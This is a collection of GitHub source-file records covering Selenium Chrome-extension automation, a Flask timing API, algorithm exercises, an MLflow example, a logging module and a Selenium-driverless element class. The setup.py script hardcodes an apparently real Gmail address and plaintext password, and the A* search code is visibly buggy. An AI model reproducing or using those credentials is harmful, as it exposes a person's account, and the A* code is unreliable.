pg.hotkey(\"enter\")\n # dri, no = bs_req(down)\n # print(dri)\n # url = dri.find(\"tbody\").find_all(\"tr\")[4].find(\"a\").get(\"href\")\n # url = \"https://chromedriver.storage.googleapis.com/\" + url\n\n\ndef nfreez():\n with zipfile.ZipFile('C:\\\\Users\\\\sml\\\\Downloads\\\\chromedriver_mac64.zip') as exi_zip:\n exi_zip.extract(\"chromedriver\", \"extensions\")\n\n\ndef start_chrome(path):\n # Chrome起動\n options = webdriver.ChromeOptions()\n\n options.add_argument(\"start-maximized\")\n options.add_argument('--user-data-dir={0}'.format(path))\n driver = webdriver.Chrome(options=options,\n executable_path=\"extensions/chromedriver.exe\")\n driver.maximize_window() # 画面サイズ最大化\n\n # GoogleログインURL\n # url = 'https://www.google.com/accounts?hl=ja-JP'\n # driver.get(url)\n\n return driver\n\n\ndef login_google(driver):\n # ログイン情報\n login_id = \"yuki.ikura.kojima@gmail.com\"\n login_pw = \"yuki1311\"\n\n # 最大待機時間(秒)\n wait_time = 30\n\n # IDを入力\n login_id_xpath = 
'//*[@id=\"identifierNext\"]'\n # xpathの要素が見つかるまで待機します。\n sleep(10)\n WebDriverWait(driver, wait_time).until(EC.presence_of_element_located((By.XPATH,\n login_id_xpath)))\n driver.find_element_by_name(\"identifier\").send_keys(login_id)\n driver.find_element_by_xpath(login_id_xpath).click()\n\n # パスワードを入力\n login_pw_xpath = '//*[@id=\"passwordNext\"]'\n # xpathの要素が見つかるまで待機します。\n WebDriverWait(driver, wait_time).until(EC.presence_of_element_located((By.XPATH,\n login_pw_xpath)))\n driver.find_element_by_name(\"password\").send_keys(login_pw)\n sleep(1) # クリックされずに処理が終わるのを防ぐために追加。\n driver.find_element_by_xpath(login_pw_xpath).click()\n\n\ndef gfp_option(driver):\n driver.get(\"chrome-extension://fdpohaocaechififmbbbbbknoalclacl/options.html\")\n sleep(5)\n driver.find_elements_by_class_name(\"options-input\")[6].click()\n # driver.execute_script('return document.querySelectorAll(\".options-input\")[6].click()')\n sleep(2)\n pg.hotkey(\"left\")\n sleep(1)\n pg.hotkey(\"enter\")\n sleep(1)\n driver.quit()\n\n\ndef expand_shadow_element_gfp(driver):\n driver.get(\n \"https://chrome.google.com/webstore/detail/gofullpage-full-page-scre/fdpohaocaechififmbbbbbknoalclacl?hl=ja\")\n sleep(5)\n driver.execute_script('return document'\n '.querySelector(\".g-c-x\").click()')\n\n sleep(3)\n pg.hotkey(\"left\")\n sleep(2)\n pg.hotkey(\"enter\")\n\n # return shadow_root\n\n\ndef expand_shadow_element_ext(driver, j):\n driver.get(\"chrome://extensions/\")\n sleep(3)\n print(j)\n # j = str(j)\n # j = j.replace(\"\\\\\", \"\\\\\\\\\")\n driver.execute_script('return document.querySelector(\"extensions-manager\")'\n '.shadowRoot.querySelector(\"extensions-toolbar\")'\n '.shadowRoot.querySelector(\"#packExtensions\").click()')\n input()\n # sleep(3)\n # # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # # '.shadowRoot.querySelector(\"cr-dialog\").querySelector(\"#root-dir\")'\n # # '.shadowRoot.querySelector(\"#input\").value=\"{0}\"'.format(j))\n # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # '.shadowRoot.querySelector(\"cr-dialog\").querySelector(\"#root-dir\")'\n # \".setAttribute('focused_', '')\")\n # driver.execute_script('return document.querySelector(\"html\").setAttribute(\"class\",\"in-dev-mode focus-outline-visible\")')\n #\n # sleep(3)\n # print(j)\n # a = 'button-container'\n # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # '.shadowRoot.querySelector(\"cr-dialog\")'\n # '.querySelector(\"[slot= {0}]\").querySelector(\".action-button\").setAttribute(\"aria-disabled\", \"false\")'.format(a))\n # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # '.shadowRoot.querySelector(\"cr-dialog\")'\n # '.querySelector(\"[slot= {0}]\").querySelector(\".action-button\").setAttribute(\"tabindex\", \"0\")'.format(a))\n # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # 
'.shadowRoot.querySelector(\"cr-dialog\")'\n # '.querySelector(\"[slot= {0}]\").querySelector(\".action-button\").removeAttribute(\"disabled\")'.format(a))\n #\n #\n # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # '.shadowRoot.querySelector(\"cr-dialog\").querySelector(\"[slot={0}]\").querySelector(\".action-button\").click()'.format(a))\n\n\n# noinspection PyBroadException\ndef main():\n u_name = os.getlogin()\n ud_path = 'C:\\\\Users\\\\{0}\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data'.format(u_name)\n driver2 = start_chrome(ud_path)\n\n expand_shadow_element_gfp(driver2)\n sleep(10)\n driver2.quit()\n gfp_id = \"fdpohaocaechififmbbbbbknoalclacl\"\n gfp_path = glob.glob(os.path.join(ud_path, \"Default\\Extensions\", gfp_id, \"*\"))\n try:\n os.mkdir(\"extensions\")\n except:\n pass\n driver2 = start_chrome(ud_path)\n for i in gfp_path:\n expand_shadow_element_ext(driver2, i)\n gfp_option(driver2)\n crx_path = glob.glob(os.path.join(ud_path, \"Default\\Extensions\", gfp_id, \"*.crx\"))\n for i in crx_path:\n shutil.copyfile(i, \"extensions\\{0}\".format(os.path.basename(i)))\n\n # x = input()\n # pg.hotkey(\"shift\", \"ctrl\", \"i\")\n # sleep(1)\n # pg.hotkey(\"shift\", \"ctrl\", \"m\")\n # sleep(1)\n # pg.hotkey(\"shift\", \"alt\", \"p\")\n # sleep(50)\n driver2.quit()\n\n\nif __name__ == \"__main__\":\n help_s()\n nfreez()\n main()\n # Googleにログイン\n # login_google(driver2)\n","repo_name":"rabi-design/pyt","sub_path":"other/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32197411110","text":"import flux\nimport requests\nfrom ...models import Timing, db\nfrom .blueprint import API\nfrom flask_simple_api import error_abort\nfrom sqlalchemy import and_, case, func\nfrom sqlalchemy.exc import IntegrityError\n\nNoneType = type(None)\n\n\n@API\ndef report_timing_start(name: str, session_id: int, test_id: (int, NoneType)=None): # pylint: disable=bad-whitespace\n interval = -flux.current_timeline.time()\n try:\n db.session.execute(\n Timing.__table__.insert().values(\n session_id=session_id, test_id=test_id, name=name, total=interval))\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n res = db.session.execute(\n Timing.__table__.update()\n .values(total=Timing.total+interval)\n .where(and_(Timing.session_id==session_id, Timing.test_id==test_id, Timing.name==name, Timing.total >= 0)))\n if res.rowcount != 1:\n error_abort('Attempted to start measurement on an already started metric', code=requests.codes.conflict) # pylint: disable=no-member, line-too-long\n db.session.commit()\n\n\n@API\ndef report_timing_end(name: str, session_id: int, test_id: (int, NoneType)=None): # pylint: disable=bad-whitespace\n timing = Timing.query.filter_by(session_id=session_id, test_id=test_id, name=name).first_or_404()\n timing.total = Timing.total + flux.current_timeline.time()\n db.session.commit()\n\n\n@API\ndef get_timings(session_id: (int, NoneType)=None, test_id: (int, NoneType)=None):\n now = flux.current_timeline.time()\n total_clause = case(\n [\n (Timing.total < 0, now + Timing.total)\n ], else_=Timing.total)\n if session_id is None and test_id is None:\n return {}\n if session_id is not None:\n total_sum_subquery = db.session.query(Timing.name, 
func.sum(total_clause).label('total_time')).\\\n group_by(Timing.session_id, Timing.name).filter_by(session_id=session_id).subquery()\n query = db.session.query(func.json_object_agg(total_sum_subquery.c.name, total_sum_subquery.c.total_time))\n else:\n query = db.session.query(func.json_object_agg(Timing.name, total_clause)).\\\n filter_by(test_id=test_id)\n return query.scalar() or {}\n","repo_name":"getslash/backslash","sub_path":"flask_app/blueprints/api/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"81"} +{"seq_id":"5249905801","text":"# 3234. 준환이의 양팔저울\nimport math\n\n\n# 저울 왼쪽의 총 무게합 : left_sum, 오른쪽의 총 무게합 : right_sum, 앞으로 저울에 더 올려야 하는 무게추들 : remain\n# 일 때, 가능한 경우의 수를 구하는 함수\ndef dfs(left_sum, right_sum, remain):\n if not remain: # 저울에 전부 다 올린 경우\n return 1\n\n if left_sum >= half:\n return (2 ** len(remain)) * math.factorial(len(remain))\n\n result = 0\n for i in range(len(remain)):\n target = remain[i]\n next_remain = remain[:i] + remain[i + 1:] # i번째를 제외\n result += dfs(left_sum + target, right_sum, next_remain) # 왼쪽에 i번째 무게추를 더함\n if left_sum >= right_sum + target: # 오른쪽에 더할 수 있는 경우\n result += dfs(left_sum, right_sum + target, next_remain)\n\n return result\n\n\nif __name__ == \"__main__\":\n T = int(input())\n\n for test_case in range(1, T + 1):\n N = int(input())\n line = list(map(int, input().split()))\n half = (sum(line) + 1) // 2\n\n answer = dfs(0, 0, line)\n\n print(\"#{} {}\".format(test_case, answer))\n","repo_name":"ribo0715/algorithm_solution","sub_path":"SW Expert Academy/3234. 준환이의 양팔저울(수정).py","file_name":"3234. 준환이의 양팔저울(수정).py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3814599809","text":"import mlflow\nfrom sklearn.datasets import load_iris\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom dotenv import dotenv_values\n\n# Configuration of tracking server\n# config = dotenv_values(\".env\")\nconfig = dotenv_values(\".env.testing\")\nmlfow_server_ip = config[\"MLFOW_SERVER_IP\"]\nmlflow.set_tracking_uri(mlfow_server_ip)\n\n\n# Start experiment\nexperiment_name = \"iris_logistic_model\"\n\n# check if experiment exist\nexisting_exp = mlflow.get_experiment_by_name(experiment_name)\nif not existing_exp:\n mlflow.create_experiment(experiment_name)\n\nexperiment = mlflow.set_experiment(experiment_name)\n\nwith mlflow.start_run(experiment_id=experiment.experiment_id):\n\n # load the iris dataset\n iris = load_iris()\n\n # split the data into training and testing sets\n X_train, X_test, y_train, y_test = train_test_split(iris.data, iris.target, test_size=0.2, random_state=42)\n\n # create a logistic regression model\n lr = LogisticRegression(penalty=\"l2\", max_iter=200)\n\n # train the model on the training data\n lr.fit(X_train, y_train)\n\n # make predictions on the testing data\n y_pred = lr.predict(X_test)\n\n # calculate the accuracy score of the model\n accuracy = accuracy_score(y_test, y_pred)\n\n mlflow.log_param(\"penalty\", \"l2\")\n mlflow.log_param(\"max_iter\", 200)\n mlflow.log_metric(\"accuracy\", accuracy)\n\n mlflow.sklearn.log_model(lr, 
\"model\")\n","repo_name":"Ivanrs297/machine-learning-projects","sub_path":"MLOps/GCP-VirtualMachines/running-instance/examples/train_mlflow.py","file_name":"train_mlflow.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"20482474559","text":"\"\"\"#algo to find next permutation #TC O(n) #SC O(1)\ncette solution est pas du tout simple a trouver ou on a le pattern est c'est facile mais si on la pas c'est super complique (dans la solution officiel une enorme partie de la communaute\nse plein de la difficulter mais je fais cette exo car il est frequemment demander donc il faut retenir le patern qui est algo connu pour trouver le next permutation.)\npour comprendre voir l'animation de la solution officiel (j'ai aussi mit une photo sur git qui explique tres simplement le pattern.) les etapes de l'algo sont les suivante : \n- trouver le premier element de la partie decroissante en commancent par la fin.\n- trouver le successsor (cad l'element superieur qui vient juste apres) de l'element qui precede le premier element de la partie decroissante .\n- swap le succesor et l'element qui precede le premier element de la partie decroissante \n- reverse la partie decroissante \nle resulat va etre le successor. \nremarque: si arr est decroissant tel que par exemple 321 alors la next permutation est la premiere permutation cad 123 cad on fait seulement reverse sur arr.\n\"\"\"\n\n\nclass Solution:\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n i = j = len(nums)-1\n \n #trouver l'idx du premier element de la (premiere) partie decroissante en commancent par la fin \n while i > 0 and nums[i-1] >= nums[i]:\n i -= 1\n \n # si i==0 cad il ya pas de partie decroissante donc arr est croissante donc le next permutation est le reverse de arr\n if i == 0: # nums are in descending order\n nums.reverse() #TC:O(n) SC:O(1)\n return \n \n k = i - 1 # index de l'element qui precede l'idx du premier element de la (premiere) partie decroissante en commancent par la fin (on l'appelera pivot)\n # recherche idx du successor (j)\n while nums[j] <= nums[k]: #O(n)\n j -= 1\n \n # swap between pivot and successor\n nums[k], nums[j] = nums[j], nums[k] \n \n # reverse the second part\n l, r = k+1, len(nums)-1 \n while l < r: #O(n)\n nums[l], nums[r] = nums[r], nums[l]\n l +=1 ; r -= 1\n","repo_name":"rtn75000/leetcode-pb","sub_path":"31. Next Permutation/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18187630175","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nA module used to set up queues for logging using multiple threads.\nThis module sets up logging using a /logs directory and tees the log output\nto the stdout stream and a filestream. The log files are then named .log\nand are placed in the /logs directory. The logs directory is created in the working directory of the script that calls it.\n\"\"\"\nimport logging\nimport logging.handlers\n# Put all your imports here, one per line. However multiple imports from the same lib are allowed on a line.\nimport multiprocessing\nimport os\nimport smtplib\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\n\n# CONSTANTS. 
These should be all in upper case\nLOGGERNAME = None\n\n# Global variables\n\n# Class definitions\n\n\nclass BufferingSMTPHandler(logging.handlers.BufferingHandler):\n def __init__(self, mailhost, fromaddr, toaddrs, subject):\n # Set up the BufferingHandler with a capacity of 2048 log messages\n logging.handlers.BufferingHandler.__init__(self, 2048)\n self.mailhost = mailhost\n self.mailport = None\n self.fromaddr = fromaddr\n self.toaddrs = toaddrs\n self.subject = subject\n self.setFormatter(logging.Formatter(\"%(asctime)s %(levelname)-5s %(message)s\"))\n\n def flushoutput(self):\n # this method is automatically called\n # Send the log messages out to the email address specified\n if len(self.buffer) > 0:\n # Set the SMTP port\n port = self.mailport\n if not port:\n port = smtplib.SMTP_PORT\n # Connect to the SMTP mailhost\n smtp = smtplib.SMTP(self.mailhost, port)\n msg = \"From: %s\\r\\nTo: %s\\r\\nSubject: %s\\r\\n\\r\\n\" % (\n self.fromaddr,\n \",\".join(self.toaddrs),\n self.subject,\n )\n for record in self.buffer:\n s = self.format(record)\n msg = msg + s + \"\\r\\n\"\n smtp.sendmail(self.fromaddr, self.toaddrs, msg)\n smtp.quit()\n self.buffer = []\n\n\n# Put your function definitions here. These should be lower-case, separated by underscores.\n\n\ndef setup_logging(\n loggername=__name__,\n logdirparent=str(os.getcwd()),\n filelogginglevel=logging.DEBUG,\n stdoutlogginglevel=logging.DEBUG,\n smtploggingenabled=False,\n smtplogginglevel=logging.INFO,\n smtpmailhost=\"localhost\",\n smtpfromaddr=\"Python default email\",\n smtptoaddr=\"test@gmail.com\",\n smtpsubj=\"Test Python Email\",\n):\n \"\"\"Setup the logging module to write logs to several different streams\n\n :param modulename: [The name of the module calling this function], defaults to 'log'\n :type modulename: str, optional\n :param logdirparent: [description], defaults to str(os.getcwd())\n :type logdirparent: [type], optional\n :param filelogginglevel: [description], defaults to logging.DEBUG\n :type filelogginglevel: [type], optional\n :param stdoutlogginglevel: [description], defaults to logging.DEBUG\n :type stdoutlogginglevel: [type], optional\n :param smtploggingenabled: [description], defaults to False\n :type smtploggingenabled: bool, optional\n :param smtplogginglevel: [description], defaults to logging.INFO\n :type smtplogginglevel: [type], optional\n :param smtpmailhost: [description], defaults to 'localhost'\n :type smtpmailhost: str, optional\n :param smtpfromaddr: [description], defaults to 'Python default email'\n :type smtpfromaddr: str, optional\n :param smtptoaddr: [description], defaults to 'test@gmail.com'\n :type smtptoaddr: str, optional\n :param smtpsubj: [description], defaults to 'Test Python Email'\n :type smtpsubj: str, optional\n :return: [description]\n :rtype: [type]\n \"\"\"\n global LOGGERNAME\n LOGGERNAME = loggername\n # Set up a queue to take in logging messages from multiple threads\n q = multiprocessing.Queue()\n # set up a stream handler for stdout\n stdout_handler = logging.StreamHandler()\n # Set the format of the messages for logs\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n )\n stdout_handler.setFormatter(formatter)\n stdout_handler.setLevel(stdoutlogginglevel)\n mainlogger = logging.getLogger(LOGGERNAME)\n mainlogger.propagate = False\n if mainlogger.hasHandlers():\n mainlogger.handlers.clear()\n mainlogger.setLevel(logging.DEBUG)\n # add the handler to the logger so records from this process are handled\n 
mainlogger.addHandler(stdout_handler)\n # Check the current working directory for a 'logs' folder to store our logfiles\n logdirectory = logdirparent + os.path.sep + \"logs\"\n # Create the directory if it doesn't already exist\n Path(logdirectory).mkdir(parents=True, exist_ok=True)\n # Now add a log handler to output to a file\n # And set the name for the logfile to be created\n logfilename = logdirectory + os.path.sep + loggername + \".log\"\n logfilehandler = logging.handlers.RotatingFileHandler(\n logfilename, maxBytes=1000000, backupCount=5\n )\n # Set the format for file log output messages\n logfilehandler.setFormatter(formatter)\n # Set the level of logging for files\n logfilehandler.setLevel(filelogginglevel)\n # Add the log handler for files\n mainlogger.addHandler(logfilehandler)\n # ql gets records from the queue and sends them to the handler\n ql = logging.handlers.QueueListener(q, stdout_handler)\n ql.start()\n # Now set up the SMTP log handler\n if smtploggingenabled:\n smtploghandler = BufferingSMTPHandler(\n smtpmailhost, smtpfromaddr, smtptoaddr, smtpsubj\n )\n smtploghandler.setLevel(smtplogginglevel)\n mainlogger.addHandler(smtploghandler)\n mainlogger.info(\"Logging setup successfully!\")\n return ql, q, mainlogger\n\n\ndef flush_smtp_logger():\n # Find the SMTP log handler\n mainlogger = logging.getLogger(LOGGERNAME)\n for handler in mainlogger.handlers:\n if handler.__class__ == BufferingSMTPHandler:\n # and flush the messages\n handler.flushoutput()\n\n\ndef logging_worker_init(q):\n # the worker processes write logs into the q, which are then handled by this queuehandler\n qh = logging.handlers.QueueHandler(q)\n logger = logging.getLogger(LOGGERNAME)\n logger.addHandler(qh)\n # remove the default stdout handler\n for handler in logger.handlers:\n if handler.__class__ == logging.StreamHandler:\n logger.removeHandler(handler)\n pass\n","repo_name":"rishil321/trinistocks.com","sub_path":"trinistocks/scheduled_scripts/custom_logging.py","file_name":"custom_logging.py","file_ext":"py","file_size_in_byte":6588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"9636684991","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 6 12:12:11 2019\r\n\r\n@author: Jerry\r\n\"\"\"\r\n\r\nfrom heapq import heappush, heappop\r\n\r\nclass Hexagon(object):\r\n g = 0\r\n h = 0\r\n def __init__(self, q, r):\r\n self.q = q\r\n self.r = r\r\n \r\n \r\nclass HexGrid(object):\r\n \r\n def heuristic(self, start, end):\r\n return (abs(start.q - end.q) \r\n + abs(start.q + start.r - end.q - end.r) \r\n + abs(start.r - end.r)) / 2\r\n \r\n def explore_neighbours(self, currv):\r\n # list of neighbours\r\n n = []\r\n moves = [(0,-1), (1,-1), (1,0), (0,1), (-1,1), (-1,0)]\r\n q = currv.q\r\n r = currv.r\r\n for dq, dr in moves:\r\n q2 = q + dq\r\n r2 = r + dr\r\n \r\n # Check that hex is within boundary\r\n if (q2 >= -3 and q2 <= 3) and (r2 >= -3 and r2 <= 3):\r\n adj = Hexagon(q2, r2)\r\n n.append(adj)\r\n return n\r\n \r\n\r\ndef AStarSearch(start, end, grid):\r\n \r\n # initialise tree\r\n start.g = 0\r\n start.h = grid.heuristic(start, end)\r\n start.f = start.g + start.h\r\n \r\n # Visited, but not expanded nodes\r\n openv = [] # a min-heap\r\n # Visited and expanded nodes\r\n closev = []\r\n # History of path\r\n camefrom = []\r\n \r\n # Insert start node to openv\r\n heappush(openv, (start.f, start))\r\n \r\n while openv:\r\n # Pop off node with lowest score\r\n currv = heappop(openv)[1]\r\n \r\n # Find neighbours\r\n 
neighbours = grid.explore_neighbours(currv)\r\n for node in neighbours:\r\n # If node is the exit square - soln found\r\n if currv == end:\r\n return track_path(camefrom, currv)\r\n \r\n node.g = currv.g + 1\r\n node.h = grid.heuristic(currv, end)\r\n node.f = node.g + node.h\r\n \r\n # If neighbour is already in open\r\n if node in openv:\r\n # this node already has a lower g, skip it\r\n index = openv.index(node)\r\n if openv[index].g <= node.g:\r\n continue\r\n \r\n elif node in closev:\r\n index = closev.index(node)\r\n # Skip if node in closed has lower g\r\n if closev[index].g <= node.g:\r\n continue\r\n # If a new shorter path has been found, add node back to open\r\n closev.remove(node)\r\n openv.append(node)\r\n \r\n \r\n else:\r\n heappush(openv, (node.f, node))\r\n # Record parent of neighbour\r\n camefrom[node] = currv\r\n \r\n # Add fully explored node to closed\r\n closev.append(currv)\r\n \r\n return \"no solution\"\r\n\r\ndef track_path(camefrom, currv):\r\n path = []\r\n # Backtrack path from current hexagon\r\n while currv in camefrom:\r\n path.append(currv)\r\n # Make current hexagon the parent\r\n currv = camefrom(currv)\r\n return path\r\n\r\n\r\n# Testing function\r\ngrid = HexGrid()\r\nstart = Hexagon(0,0)\r\nend = Hexagon(3,-1)\r\n\r\nAStarSearch(start, end, grid)","repo_name":"anemoiusjerry/AI-Proj-I-Checkers-Variation-Game","sub_path":"astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73741313544","text":"from __future__ import annotations\n\nfrom networkx import Graph, articulation_points, is_empty\n\nfrom plagdef.model.models import Cluster, RatedCluster\n\n\nclass ClusterFilter:\n def __init__(self, min_cluster_char_len: int):\n self._min_cluster_char_len = min_cluster_char_len\n\n def filter(self, clusters: set[Cluster]):\n resolved_clusters = _resolve_overlaps(clusters)\n return self._remove_small_clusters(resolved_clusters)\n\n def _remove_small_clusters(self, clusters: set[Cluster]) -> set[Cluster]:\n filtered_clusters = set()\n for cluster in clusters:\n cluster_char_lengths = cluster.char_lengths()\n if cluster_char_lengths[0] >= self._min_cluster_char_len \\\n and cluster_char_lengths[1] >= self._min_cluster_char_len:\n filtered_clusters.add(cluster)\n return filtered_clusters\n\n\ndef _resolve_overlaps(clusters: set[Cluster]) -> set[Cluster]:\n overlap_graph = _build_overlap_graph(clusters)\n cluster = _next_overlapping_cluster(overlap_graph)\n while cluster:\n ol_clusters = overlap_graph.adj[cluster]\n best_rated_cluster = RatedCluster(cluster, 0, 0)\n for ol_cluster in ol_clusters:\n better_rated_cluster = cluster.best_with_respect_to(ol_cluster)\n if better_rated_cluster > best_rated_cluster:\n best_rated_cluster = better_rated_cluster\n if cluster == best_rated_cluster:\n overlap_graph.remove_nodes_from(ol_clusters)\n else:\n overlap_graph.remove_node(cluster)\n cluster = _next_overlapping_cluster(overlap_graph)\n return set(overlap_graph)\n\n\ndef _build_overlap_graph(clusters: set[Cluster]) -> Graph:\n graph = Graph()\n for cluster in clusters:\n graph.add_node(cluster)\n for ol_cluster in clusters:\n if cluster != ol_cluster and cluster.overlaps_with(ol_cluster):\n graph.add_edge(cluster, ol_cluster)\n return graph\n\n\ndef _next_overlapping_cluster(graph: Graph):\n cluster = None\n if not is_empty(graph):\n try:\n cluster = next(articulation_points(graph))\n except StopIteration:\n cluster = max(graph.degree, 
key=lambda x: x[1])[0]\n return cluster\n","repo_name":"devWhyqueue/plagdef","sub_path":"plagdef/model/pipeline/filtering.py","file_name":"filtering.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40088488447","text":"import time\nimport traceback\nimport warnings\nimport numpy as np\n\nfrom base64 import b64decode\nfrom collections import defaultdict\nfrom cdp_socket.exceptions import CDPError\n\n# driverless\nfrom selenium_driverless.types.by import By\nfrom selenium_driverless.types.deserialize import JSRemoteObj, StaleJSRemoteObjReference\nfrom selenium_driverless.scripts.geometry import gen_heatmap, gen_rand_point, centroid\n\n\nclass NoSuchElementException(Exception):\n pass\n\n\nclass StaleElementReferenceException(StaleJSRemoteObjReference):\n def __init__(self, elem):\n message = f\"Page or Frame has been reloaded, or the element removed, {elem}\"\n super().__init__(_object=elem, message=message)\n\n\nclass ElementNotVisible(Exception):\n pass\n\n\nclass ElementNotInteractable(Exception):\n def __init__(self, x: float, y: float, _type: str = \"interactable\"):\n super().__init__(f\"element not {_type} at x:{x}, y:{y}, it might be hidden under another one\")\n\n\nclass ElementNotClickable(ElementNotInteractable):\n def __init__(self, x: float, y: float):\n super().__init__(x, y, _type=\"clickable\")\n\n\n# noinspection PyProtectedMember\nclass WebElement(JSRemoteObj):\n \"\"\"Represents a DOM element.\n\n Generally, all interesting operations that interact with a document will be\n performed through this interface.\n\n All method calls will do a freshness check to ensure that the element\n reference is still valid. This essentially determines whether the\n element is still attached to the DOM. 
If this test fails, then an\n ``StaleElementReferenceException`` is thrown, and all future calls to this\n instance will fail.\n \"\"\"\n\n def __init__(self, target, frame_id: int or None, isolated_exec_id: int or None, obj_id=None,\n node_id=None, backend_node_id: str = None, loop=None, class_name: str = None,\n context_id: int = None, is_iframe: bool = False) -> None:\n self._loop = loop\n if not (obj_id or node_id or backend_node_id):\n raise ValueError(\"either js, obj_id or node_id need to be specified\")\n self._node_id = node_id\n self._backend_node_id = backend_node_id\n self._class_name = class_name\n self._started = False\n self.___context_id__ = context_id\n self._obj_ids = {context_id: obj_id}\n self.___frame_id__ = None\n self._is_iframe = is_iframe\n self._stale = False\n if obj_id and context_id:\n self._obj_ids[context_id] = obj_id\n self.___obj_id__ = None\n super().__init__(target=target, frame_id=frame_id, obj_id=obj_id, isolated_exec_id=isolated_exec_id)\n\n def __await__(self):\n return self.__aenter__().__await__()\n\n async def __aenter__(self):\n if not self._started:\n async def set_stale_frame(data):\n if data[\"frame\"][\"id\"] == self.___frame_id__:\n self._stale = True\n await self.__target__.remove_cdp_listener(\"Page.frameNavigated\", set_stale_frame)\n\n if not self.__target__._page_enabled:\n await self.__target__.execute_cdp_cmd(\"Page.enable\")\n await self.__target__.add_cdp_listener(\"Page.frameNavigated\", set_stale_frame)\n self._started = True\n\n return self\n\n @property\n async def obj_id(self):\n return await self.__obj_id_for_context__()\n\n @property\n async def context_id(self):\n self._check_stale()\n if not self.___context_id__:\n await self.obj_id\n return self.__context_id__\n\n def _check_stale(self):\n if self._stale:\n raise StaleElementReferenceException(elem=self)\n\n @property\n def _args_builder(self) -> dict:\n self._check_stale()\n if self._node_id:\n return {\"nodeId\": self._node_id}\n elif self.__obj_id__:\n return {\"objectId\": self.__obj_id__}\n elif self._backend_node_id:\n return {\"backendNodeId\": self._backend_node_id}\n else:\n raise ValueError(f\"missing remote element id's for {self}\")\n\n async def __obj_id_for_context__(self, context_id: int = None):\n self._check_stale()\n if not self._obj_ids.get(context_id):\n args = {}\n if self._backend_node_id:\n args[\"backendNodeId\"] = self._backend_node_id\n elif self._node_id:\n args[\"nodeId\"] = self._node_id\n else:\n raise ValueError(f\"missing remote element id's for {self}\")\n\n if context_id:\n args[\"executionContextId\"] = context_id\n try:\n res = await self.__target__.execute_cdp_cmd(\"DOM.resolveNode\", args)\n except CDPError as e:\n if e.code == -32000 and e.message == 'No node with given id found':\n raise StaleElementReferenceException(self)\n else:\n raise e\n obj_id = res[\"object\"].get(\"objectId\")\n if obj_id:\n if self.__context_id__ == context_id:\n self.___obj_id__ = obj_id\n self._obj_ids[context_id] = obj_id\n class_name = res[\"object\"].get(\"className\")\n if class_name:\n self._class_name = class_name\n return self._obj_ids.get(context_id)\n\n @property\n def __context_id__(self):\n if self.__obj_id__:\n return int(self.__obj_id__.split(\".\")[1])\n else:\n return self.___context_id__\n\n @property\n async def node_id(self):\n self._check_stale()\n if not self._node_id:\n node = await self.__target__.execute_cdp_cmd(\"DOM.requestNode\", {\"objectId\": await self.obj_id})\n self._node_id = node[\"nodeId\"]\n return self._node_id\n\n 
@property\n async def __frame_id__(self) -> int:\n if not self.___frame_id__:\n await self._describe()\n return self.___frame_id__\n\n @property\n async def content_document(self):\n \"\"\"\n gets the document of the iframe\n \"\"\"\n _desc = await self._describe()\n if _desc.get(\"localName\") == \"iframe\":\n node = _desc.get(\"contentDocument\")\n if node:\n frame_id = _desc.get(\"frameId\")\n if node['documentURL'] == 'about:blank':\n # wait for frame to load\n if not self.__target__._page_enabled:\n await self.__target__.execute_cdp_cmd(\"Page.enable\")\n async for data in await self.__target__.get_cdp_event_iter(\"Page.frameNavigated\"):\n frame = data[\"frame\"]\n if frame[\"id\"] == frame_id:\n break\n self._stale = False\n _desc = await self._describe()\n node = _desc.get(\"contentDocument\")\n if self._loop:\n from selenium_driverless.sync.webelement import WebElement as SyncWebElement\n return await SyncWebElement(backend_node_id=node.get('backendNodeId'),\n target=self.__target__, loop=self._loop,\n class_name='HTMLIFrameElement',\n isolated_exec_id=None, 